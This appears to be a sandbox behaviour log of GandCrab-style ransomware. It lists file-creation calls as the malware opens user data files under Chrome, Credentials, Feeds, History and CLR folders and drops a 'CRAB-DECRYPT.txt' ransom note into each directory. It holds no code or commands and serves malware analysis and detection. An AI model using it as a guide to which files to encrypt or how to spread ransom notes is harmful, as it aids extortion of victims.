Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\AggregateCache.uca desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\store.vol desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\tmp.edb desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.chk desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USSres00001.jrs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USSres00002.jrs desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USStmp.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateTransparency\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\settings.dat desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CrashpadMetrics-active.pma desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\IndexedDB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.db desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Extension Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\EVWhitelist\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PepperFlash\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Safe Browsing\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SwReporter\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\CrashReports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\MSHist012018031420180315\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\History.IE5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\UsageLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\UsageLogs\addinutil.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\ngen.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\mmc.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\NGenTask.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\powershell_ise.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\ngen.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\NGenTask.exe.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Credentials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Event Viewer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\FeedsStore.feedsdb-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\3Y244KAF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\ASF6K8JF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\M2CKLQNS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\ZH5Q7INF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FORMS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\FORMS\FRMDATA64.DAT desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\GameDVR\KnownGameList.bin desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InstallAgent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InstallAgent\Checkpoints\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\brndlog.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DomainSuggestions\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\DOMStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
